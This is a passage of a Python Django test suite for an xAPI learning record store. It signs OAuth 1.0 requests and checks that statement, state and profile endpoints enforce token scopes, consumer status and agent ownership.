param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='PUT',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
put = self.client.put(path, data=teststate, content_type="application/json",
Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(put.status_code, 204)
# ==========================================================
# Set up for Get
guid = str(uuid.uuid1())
stmt_data = {"id":guid,"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}},
"object": {"id":"act:test_simple_get"}, "authority":{"objectType":"Agent", "mbox":"mailto:[email protected]"}}
stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json",
Authorization=self.jane_auth, X_Experience_API_Version="1.0.0")
self.assertEqual(stmt_post.status_code, 200)
param = {"statementId":guid}
path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param))
# Use same oauth_headers as before and change the nonce
oauth_header_resource_params_dict['oauth_nonce'] = 'differ_nonce'
# create another oauth request
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature2 = signature_method.sign(oauth_request, self.consumer, access_token)
# Replace old signature with the new one
oauth_header_resource_params_new = oauth_header_resource_params.replace('"%s"' % signature, '"%s"' % signature2)
# replace headers with the nonce you added in dict
new_oauth_headers = oauth_header_resource_params_new.replace('oauth_nonce="resource_nonce"','oauth_nonce="differ_nonce"')
get = self.client.get(path, content_type="application/json",
Authorization=new_oauth_headers, X_Experience_API_Version="1.0.0")
self.assertEqual(get.status_code, 403)
self.assertEqual(get.content, 'Incorrect permissions to GET at /statements')
def stmt_get_then_wrong_profile_scope(self):
guid = str(uuid.uuid1())
stmt_data = {"id":guid,"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}},
"object": {"id":"act:test_simple_get"}, "authority":{"objectType":"Agent", "mbox":"mailto:[email protected]"}}
stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json",
Authorization=self.jane_auth, X_Experience_API_Version="1.0.0")
self.assertEqual(stmt_post.status_code, 200)
param = {"statementId":guid}
path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param))
oauth_header_resource_params, access_token = self.oauth_handshake(scope_type="statements/read")
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
resp = self.client.get(path,Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 200)
rsp = resp.content
self.assertIn(guid, rsp)
# ===================================================================
url = 'http://testserver/XAPI/agents/profile'
params = {"agent": {"mbox":"mailto:[email protected]"}}
path = "%s?%s" %(url, urllib.urlencode(params))
# Use same oauth header, change nonce
oauth_header_resource_params_dict['oauth_nonce'] = 'differ_nonce'
# create another oauth request
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method2 = oauth.SignatureMethod_HMAC_SHA1()
signature2 = signature_method2.sign(oauth_request, self.consumer, access_token)
# Replace signature with new one
new_sig_params = oauth_header_resource_params.replace('"%s"' % signature, '"%s"' % signature2 )
# replace headers with the nonce you added in dict
new_oauth_headers = new_sig_params.replace('oauth_nonce="resource_nonce"','oauth_nonce="differ_nonce"')
r = self.client.get(path, Authorization=new_oauth_headers, X_Experience_API_Version="1.0.0")
self.assertEqual(r.status_code, 403)
def test_consumer_state(self):
stmt_data = {"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bob"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}},
"object": {"id":"act:test_complex_get"}, "authority":{"objectType":"Agent", "mbox":"mailto:[email protected]"}}
stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json",
Authorization=self.jane_auth, X_Experience_API_Version="1.0.0")
self.assertEqual(stmt_post.status_code, 200)
param = {"object":{"objectType": "Activity", "id":"act:test_complex_get"}}
path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param))
oauth_header_resource_params, access_token = self.oauth_handshake()
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
# Change the consumer state
consumer = access_token.consumer
consumer.status = 4
consumer.save()
resp = self.client.get(path,Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 401)
self.assertEqual(resp.content, 'Invalid Consumer.')
def test_simple_stmt_get_mine_only(self):
guid = str(uuid.uuid1())
# Put statement normally
username = "tester1"
email = "[email protected]"
password = "test"
auth = "Basic %s" % base64.b64encode("%s:%s" % (username, password))
form = {"username":username, "email":email,"password":password,"password2":password}
self.client.post(reverse(register),form, X_Experience_API_Version="1.0.0")
param = {"statementId":guid}
path = "%s?%s" % (reverse(statements), urllib.urlencode(param))
stmt = json.dumps({"verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}},
"object": {"id":"act:test_put"},"actor":{"objectType":"Agent", "mbox":"mailto:[email protected]"}})
put_resp = self.client.put(path, stmt, content_type="application/json", Authorization=auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put_resp.status_code, 204)
param = {"statementId":guid}
path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param))
# ====================================================
oauth_header_resource_params, access_token = self.oauth_handshake(scope_type="statements/read/mine")
# From_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
resp = self.client.get(path, Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 403)
# ===================================================
# build stmt data and path
oauth_agent1 = Agent.objects.get(account_name=self.consumer.key)
oauth_agent2 = Agent.objects.get(mbox="mailto:[email protected]")
oauth_group = Agent.objects.get(member__in=[oauth_agent1, oauth_agent2])
guid = str(uuid.uuid1())
stmt_data = {"id":guid,"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bill"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/accessed","display": {"en-US":"accessed"}},
"object": {"id":"act:test_put"}, "authority":oauth_group.to_dict()}
settings.ALLOW_EMPTY_HTTP_AUTH = True
stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json",
Authorization="Basic %s" % base64.b64encode("%s:%s" % ('','')), X_Experience_API_Version="1.0.0")
self.assertEqual(stmt_post.status_code, 200)
param = {"statementId":guid}
path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param))
# Use same oauth headers but replace the nonce
oauth_header_resource_params_dict['oauth_nonce'] = 'get_differ_nonce'
# Create another oauth request, replace the signature with new one and change the nonce
oauth_request2 = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method2 = oauth.SignatureMethod_HMAC_SHA1()
signature2 = signature_method2.sign(oauth_request2, self.consumer, access_token)
sig = oauth_header_resource_params.replace('"%s"' % signature, '"%s"' % signature2)
new_oauth_headers = sig.replace('oauth_nonce="resource_nonce"','oauth_nonce="get_differ_nonce"')
get = self.client.get(path, content_type="application/json",
Authorization=new_oauth_headers, X_Experience_API_Version="1.0.0")
self.assertEqual(get.status_code, 200)
settings.ALLOW_EMPTY_HTTP_AUTH = False
def test_complex_stmt_get_mine_only(self):
guid = str(uuid.uuid1())
username = "tester1"
email = "[email protected]"
password = "test"
auth = "Basic %s" % base64.b64encode("%s:%s" % (username, password))
form = {"username":username, "email":email,"password":password,"password2":password}
self.client.post(reverse(register),form, X_Experience_API_Version="1.0.0")
# Put statement
param = {"statementId":guid}
path = "%s?%s" % (reverse(statements), urllib.urlencode(param))
stmt = json.dumps({"verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}},
"object": {"id":"act:test_put"},"actor":{"objectType":"Agent", "mbox":"mailto:[email protected]"}})
put_response = self.client.put(path, stmt, content_type="application/json", Authorization=auth, X_Experience_API_Version="1.0.0")
self.assertEqual(put_response.status_code, 204)
# =============================================
param = {"statementId":guid}
path = "%s?%s" % ('http://testserver/XAPI/statements', urllib.urlencode(param))
oauth_header_resource_params, access_token = self.oauth_handshake(scope_type="statements/read/mine")
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
resp = self.client.get(path, Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 403)
# ====================================================
# Should return 0 statements since the only statement is not this user's
# Use same oauth headers but replace the nonce
oauth_header_resource_params_dict['oauth_nonce'] = 'differ_nonce'
# Create another oauth request and add the signature
oauth_request2 = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url='http://testserver/XAPI/statements', parameters=oauth_header_resource_params_dict)
signature_method2 = oauth.SignatureMethod_HMAC_SHA1()
signature2 = signature_method2.sign(oauth_request2, self.consumer, access_token)
sig = oauth_header_resource_params.replace('"%s"' % signature, '"%s"' % signature2)
new_oauth_headers = sig.replace('oauth_nonce="resource_nonce"','oauth_nonce="differ_nonce"')
# Get statements
get = self.client.get('http://testserver/XAPI/statements', content_type="application/json",
Authorization=new_oauth_headers, X_Experience_API_Version="1.0.0")
get_content = json.loads(get.content)
self.assertEqual(get.status_code, 200)
self.assertEqual(len(get_content['statements']), 0)
# ====================================================
# Should return the newly created single statement
# build stmt data and path
oauth_agent1 = Agent.objects.get(account_name=self.consumer.key)
oauth_agent2 = Agent.objects.get(mbox="mailto:[email protected]")
oauth_group = Agent.objects.get(member__in=[oauth_agent1, oauth_agent2])
guid = str(uuid.uuid1())
stmt_data = {"id":guid,"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bill"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/accessed","display": {"en-US":"accessed"}},
"object": {"id":"act:test_put"}, "authority":oauth_group.to_dict()}
stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json",
Authorization=self.jane_auth, X_Experience_API_Version="1.0.0")
self.assertEqual(stmt_post.status_code, 200)
# Use same headers, change nonce
oauth_header_resource_params_dict['oauth_nonce'] = 'get_differ_nonce'
# Create oauth request and add signature
oauth_request3 = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url='http://testserver/XAPI/statements', parameters=oauth_header_resource_params_dict)
signature_method3 = oauth.SignatureMethod_HMAC_SHA1()
signature3 = signature_method3.sign(oauth_request3, self.consumer, access_token)
sig2 = oauth_header_resource_params.replace('"%s"' % signature, '"%s"' % signature3)
new_oauth_headers2 = sig2.replace('oauth_nonce="resource_nonce"','oauth_nonce="get_differ_nonce"')
# Get statements
get2 = self.client.get('http://testserver/XAPI/statements', content_type="application/json",
Authorization=new_oauth_headers2, X_Experience_API_Version="1.0.0")
get_content2 = json.loads(get2.content)
self.assertEqual(get2.status_code, 200)
self.assertEqual(get_content2['statements'][0]['actor']['name'], 'bill')
self.assertEqual(len(get_content2['statements']), 1)
def test_state_wrong_auth(self):
# This test agent is not in this auth
url = 'http://testserver/XAPI/activities/state'
testagent = '{"name":"joe","mbox":"mailto:[email protected]"}'
activityId = "http://www.iana.org/domains/example/"
stateId = "id:the_state_id"
activity = Activity(activity_id=activityId)
activity.save()
testparams = {"stateId": stateId, "activityId": activityId, "agent": testagent}
teststate = {"test":"put activity state 1"}
path = '%s?%s' % (url, urllib.urlencode(testparams))
oauth_header_resource_params, access_token = self.oauth_handshake(scope_type='state')
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='PUT',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
put = self.client.put(path, data=teststate, content_type="application/json",
Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(put.status_code, 404)
self.assertEqual(put.content, "Agent in state cannot be found to match user in authorization")
def test_profile_wrong_auth(self):
agent = Agent(name="joe", mbox="mailto:[email protected]")
agent.save()
# Agent is not in this auth
url = 'http://testserver/XAPI/agents/profile'
testparams = {"agent": '{"name":"joe","mbox":"mailto:[email protected]"}'}
path = '%s?%s' % (url, urllib.urlencode(testparams))
oauth_header_resource_params, access_token = self.oauth_handshake(scope_type='profile')
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
get = self.client.get(path, content_type="application/json",
Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(get.status_code, 403)
self.assertEqual(get.content, "Authorization doesn't match agent in profile")
def test_define_scope_activity(self):
url = 'http://testserver/XAPI/statements'
guid = str(uuid.uuid1())
stmt_data = {"id":guid,"actor":{"objectType": "Agent",
"mbox":"mailto:[email protected]", "name":"bob"},"verb":{"id": "http://adlnet.gov/expapi/verbs/passed",
"display": {"en-US":"passed"}},"object": {"id":"test://test/define/scope"},
"authority":{"objectType":"Agent", "mbox":"mailto:[email protected]"}}
stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json",
Authorization=self.jane_auth, X_Experience_API_Version="1.0.0")
self.assertEqual(stmt_post.status_code, 200)
# build stmt data and path
put_guid = str(uuid.uuid1())
stmt = json.dumps({"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bill"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/accessed","display": {"en-US":"accessed"}},
"object": {"id":"test://test/define/scope",
'definition': {'name': {'en-US':'testname', 'en-GB': 'altname'},
'description': {'en-US':'testdesc', 'en-GB': 'altdesc'},'type': 'type:course',
'interactionType': 'other'}}})
param = {"statementId":put_guid}
path = "%s?%s" % (url, urllib.urlencode(param))
# START PUT STMT
oauth_header_resource_params, access_token = self.oauth_handshake(scope_type='statements/write statements/read')
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='PUT',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
# Put statements - does not have define scope, therefore it creates another activity with
# canonical_version as false
resp = self.client.put(path, data=stmt, content_type="application/json",
Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 204)
acts = Activity.objects.all()
self.assertEqual(len(acts), 2)
self.assertEqual(acts[0].activity_id, acts[1].activity_id)
# ==========================================================
# START GET STMT
get_params = {"activity":"test://test/define/scope"}
path = "%s?%s" % (url, urllib.urlencode(get_params))
# User same oauth headers, change nonce
oauth_header_resource_params_dict['oauth_nonce'] = 'get_differ_nonce'
# Create oauth request and add signature
oauth_request2 = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method2 = oauth.SignatureMethod_HMAC_SHA1()
signature2 = signature_method2.sign(oauth_request2, self.consumer, access_token)
sig = oauth_header_resource_params.replace('"%s"' % signature, '"%s"' % signature2)
new_oauth_headers = sig.replace('oauth_nonce="resource_nonce"','oauth_nonce="get_differ_nonce"')
get_resp = self.client.get(path, X_Experience_API_Version="1.0.0", Authorization=new_oauth_headers)
self.assertEqual(get_resp.status_code, 200)
content = json.loads(get_resp.content)
self.assertEqual(len(content['statements']), 2)
self.client.logout()
# ==========================================================
# START OF POST WITH ANOTHER HANDSHAKE
post_stmt = {"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"dom"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/tested","display": {"en-US":"tested"}},
"object": {"id":"test://test/define/scope",
'definition': {'name': {'en-US':'definename', 'en-GB': 'definealtname'},
'description': {'en-US':'definedesc', 'en-GB': 'definealtdesc'},'type': 'type:course',
'interactionType': 'other'}}}
stmt_json = json.dumps(post_stmt)
post_oauth_header_resource_params, post_access_token = self.oauth_handshake2(scope_type='define statements/write')
# from_token_and_callback takes a dictionary
post_param_list = post_oauth_header_resource_params.split(",")
post_oauth_header_resource_params_dict = {}
for p in post_param_list:
item = p.split("=")
post_oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del post_oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
post_oauth_request = oauth.Request.from_token_and_callback(post_access_token, http_method='POST',
http_url='http://testserver/XAPI/statements/',
parameters=post_oauth_header_resource_params_dict)
post_signature_method = oauth.SignatureMethod_HMAC_SHA1()
post_signature = post_signature_method.sign(post_oauth_request, self.consumer2, post_access_token)
post_oauth_header_resource_params += ',oauth_signature="%s"' % post_signature
# This adds the act_def to the very first activity created in this test since this has define scope
post = self.client.post('/XAPI/statements/', data=stmt_json, content_type="application/json",
Authorization=post_oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(post.status_code, 200)
acts = Activity.objects.all()
# One canonical act from jane, one local act for oauth_group jane is in since don't have define,
# one local act for dick
self.assertEqual(len(acts), 3)
global_act = Activity.objects.get(canonical_version=True)
global_name_list = global_act.activity_definition_name
self.assertEqual(global_name_list, {})
global_desc_list = global_act.activity_definition_description
self.assertEqual(global_desc_list, {})
jane_agent = Agent.objects.get(mbox="mailto:[email protected]")
jane_oauth_group = Agent.objects.get(objectType='Group', member__in=[jane_agent])
non_global_act_jane_oauth = Activity.objects.get(canonical_version=False, authority=jane_oauth_group)
non_global_name_list_jane_oauth = non_global_act_jane_oauth.activity_definition_name.values()
self.assertIn('testname', non_global_name_list_jane_oauth)
self.assertIn('altname', non_global_name_list_jane_oauth)
non_global_desc_list_jane_oauth = non_global_act_jane_oauth.activity_definition_description.values()
self.assertIn('testdesc', non_global_desc_list_jane_oauth)
self.assertIn('altdesc', non_global_desc_list_jane_oauth)
dick_agent = Agent.objects.get(mbox="mailto:[email protected]")
dick_oauth_group = Agent.objects.get(objectType='Group', member__in=[dick_agent])
non_global_act_dick_oauth = Activity.objects.get(canonical_version=False, authority=dick_oauth_group)
non_global_name_list_dick_oauth = non_global_act_dick_oauth.activity_definition_name.values()
self.assertIn('definename', non_global_name_list_dick_oauth)
self.assertIn('definealtname', non_global_name_list_dick_oauth)
non_global_desc_list_dick_oauth = non_global_act_dick_oauth.activity_definition_description.values()
self.assertIn('definedesc', non_global_desc_list_dick_oauth)
self.assertIn('definealtdesc', non_global_desc_list_dick_oauth)
def test_define_scope_agent(self):
url = 'http://testserver/XAPI/statements'
guid = str(uuid.uuid1())
stmt_data = {"id":guid,"actor":{"objectType": "Agent",
"mbox":"mailto:[email protected]", "name":"bob"},"verb":{"id": "http://adlnet.gov/expapi/verbs/helped",
"display": {"en-US":"helped"}},"object": {"objectType":"Agent", "mbox":"mailto:[email protected]",
"name":"tim"}}
stmt_post = self.client.post(reverse(statements), json.dumps(stmt_data), content_type="application/json",
Authorization=self.jane_auth, X_Experience_API_Version="1.0.0")
self.assertEqual(stmt_post.status_code, 200)
# build stmt data and path
put_guid = str(uuid.uuid1())
stmt = json.dumps({"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"bill"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/talked","display": {"en-US":"talked"}},
"object": {"objectType":"Agent", "mbox":"mailto:[email protected]","name":"tim timson"}})
param = {"statementId":put_guid}
path = "%s?%s" % (url, urllib.urlencode(param))
# START PUT STMT
oauth_header_resource_params, access_token = self.oauth_handshake(scope_type='statements/write statements/read')
# from_token_and_callback takes a dictionary
param_list = oauth_header_resource_params.split(",")
oauth_header_resource_params_dict = {}
for p in param_list:
item = p.split("=")
oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='PUT',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method = oauth.SignatureMethod_HMAC_SHA1()
signature = signature_method.sign(oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % signature
# Put statements
resp = self.client.put(path, data=stmt, content_type="application/json",
Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(resp.status_code, 204)
agents = Agent.objects.all().values_list('name', flat=True)
# Jane, Anonymous agent for account, Group for jane and account, bill, bob, tim, tim timson
self.assertEqual(len(agents), 7)
self.assertIn('tim', agents)
self.assertIn('tim timson', agents)
tim = Agent.objects.get(name='tim timson')
self.assertFalse(tim.canonical_version)
tim = Agent.objects.get(name='tim')
self.assertTrue(tim.canonical_version)
# =================================================
# START GET STMT
get_params = {"agent":{"objectType": "Agent", "mbox":"mailto:[email protected]"}, "related_agents":True}
path = "%s?%s" % (url, urllib.urlencode(get_params))
# Use same oauth headers, replace nonce
oauth_header_resource_params_dict['oauth_nonce'] = 'get_differ_nonce'
# Create oauth request and add signature
oauth_request2 = oauth.Request.from_token_and_callback(access_token, http_method='GET',
http_url=path, parameters=oauth_header_resource_params_dict)
signature_method2 = oauth.SignatureMethod_HMAC_SHA1()
signature2 = signature_method2.sign(oauth_request2, self.consumer, access_token)
sig = oauth_header_resource_params.replace('"%s"' % signature, '"%s"' % signature2)
new_oauth_headers = sig.replace('oauth_nonce="resource_nonce"','oauth_nonce="get_differ_nonce"')
get_resp = self.client.get(path, X_Experience_API_Version="1.0.0",
Authorization=new_oauth_headers)
self.assertEqual(get_resp.status_code, 200)
content = json.loads(get_resp.content)
# Should only be one since querying by tim email. Will only pick up global tim object
self.assertEqual(len(content['statements']), 1)
self.client.logout()
# ==================================================
# START OF POST WITH ANOTHER HANDSHAKE
# Anonymous group that will make 2 canonical agents
ot = "Group"
members = [{"name":"john doe","mbox":"mailto:[email protected]"},
{"name":"jan doe","mbox":"mailto:[email protected]"}]
kwargs = {"objectType":ot, "member": members, "name": "doe group"}
global_group, created = Agent.objects.retrieve_or_create(**kwargs)
# Anonymous group that will retrieve two agents and create one more canonical agents
members = [{"name":"john doe","mbox":"mailto:[email protected]"},
{"name":"jan doe","mbox":"mailto:[email protected]"},
{"name":"dave doe", "mbox":"mailto:[email protected]"}]
kwargs1 = {"objectType":ot, "member": members, "name": "doe group"}
post_stmt = {"actor":{"objectType": "Agent", "mbox":"mailto:[email protected]", "name":"dom"},
"verb":{"id": "http://adlnet.gov/expapi/verbs/assisted","display": {"en-US":"assisted"}},
"object": kwargs1}
stmt_json = json.dumps(post_stmt)
post_oauth_header_resource_params, post_access_token = self.oauth_handshake2(scope_type='statements/write statements/read')
# from_token_and_callback takes a dictionary
post_param_list = post_oauth_header_resource_params.split(",")
post_oauth_header_resource_params_dict = {}
for p in post_param_list:
item = p.split("=")
post_oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del post_oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
post_oauth_request = oauth.Request.from_token_and_callback(post_access_token, http_method='POST',
http_url='http://testserver/XAPI/statements/',
parameters=post_oauth_header_resource_params_dict)
post_signature_method = oauth.SignatureMethod_HMAC_SHA1()
post_signature = post_signature_method.sign(post_oauth_request, self.consumer2,
post_access_token)
post_oauth_header_resource_params += ',oauth_signature="%s"' % post_signature
post = self.client.post('/XAPI/statements/', data=stmt_json, content_type="application/json",
Authorization=post_oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(post.status_code, 200)
agents = Agent.objects.all()
# These 5 agents are all non-global since created w/o define scope
non_globals = Agent.objects.filter(canonical_version=False).values_list('name', flat=True)
self.assertEqual(len(non_globals), 4)
self.assertIn('bill', non_globals)
self.assertIn('tim timson', non_globals)
self.assertIn('dom', non_globals)
self.assertIn('doe group', non_globals)
# 2 oauth group objects, all of these agents since created with member or manually and 2 anon
# account agents for the accounts in the oauth groups
global_agents = Agent.objects.filter(canonical_version=True).values_list('name', flat=True)
self.assertEqual(len(global_agents), 12)
self.assertIn('bob', global_agents)
self.assertIn('tim', global_agents)
self.assertIn('jan doe', global_agents)
self.assertIn('john doe', global_agents)
self.assertIn('dave doe', global_agents)
self.assertIn('jane', global_agents)
self.assertIn('dick', global_agents)
self.assertIn('doe group', global_agents)
def test_default_scope_multiple_requests(self):
oauth_header_resource_params, access_token = self.oauth_handshake(scope=False)
stmt = json.dumps({"verb":{"id": "http://adlnet.gov/expapi/verbs/passed","display": {"en-US":"passed"}},
"object": {"id":"act:test_post"},"actor":{"objectType":"Agent", "mbox":"mailto:[email protected]"}})
# from_token_and_callback takes a dictionary
post_param_list = oauth_header_resource_params.split(",")
post_oauth_header_resource_params_dict = {}
for p in post_param_list:
item = p.split("=")
post_oauth_header_resource_params_dict[str(item[0]).strip()] = str(item[1]).strip('"')
# from_request ignores realm, must remove so not input to from_token_and_callback
del post_oauth_header_resource_params_dict['OAuth realm']
# Create oauth request and add signature
post_oauth_request = oauth.Request.from_token_and_callback(access_token, http_method='POST',
http_url=TEST_SERVER + '/XAPI/statements/', parameters=post_oauth_header_resource_params_dict)
post_signature_method = oauth.SignatureMethod_HMAC_SHA1()
post_signature = post_signature_method.sign(post_oauth_request, self.consumer, access_token)
oauth_header_resource_params += ',oauth_signature="%s"' % post_signature
post = self.client.post(TEST_SERVER + '/XAPI/statements/', data=stmt, content_type="application/json",
Authorization=oauth_header_resource_params, X_Experience_API_Version="1.0.0")
self.assertEqual(post.status_code, 200)
# ====================================================
stmt2 = json.dumps({"verb":{"id": "http://adlnet.gov/expapi/verbs/failed","display": {"en-US":"failed"}},
"object": {"id":"act:test_post"},"actor":{"objectType":"Agent", "mbox":"mailto:[email protected]"}})
# Use same oauth headers, replace nonce
post_oauth_header_resource_params_dict['oauth_nonce'] = 'post_differ_nonce'
# Create oauth request and add signature
post_oauth_request2 = oauth.Request.from_token_and_callback(access_token, http_method='POST',
